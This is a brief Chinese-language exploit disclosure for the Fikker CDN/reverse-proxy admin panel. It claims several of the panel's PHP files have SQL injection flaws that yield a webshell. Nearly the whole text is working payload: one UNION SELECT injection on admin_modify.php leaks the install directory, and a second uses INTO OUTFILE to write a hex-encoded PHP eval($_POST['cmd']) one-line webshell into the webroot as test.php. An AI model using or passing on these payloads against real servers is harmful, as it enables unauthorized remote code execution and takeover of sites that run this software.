Fikker 是一款面向 CDN/站长 的专业级网站缓存(Webcache)和反向代理服务器软件(Reversed Proxy Server)。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞,可获取Webshell
#爆目录
admin_modify.php?id=-1%20union%20select%201,
@@basedir,3,4,5,6,7,8,9,10,11,12,13
#写一句话
admin_modify.php?id=1%20and%201=2%20union%20
select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,
0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27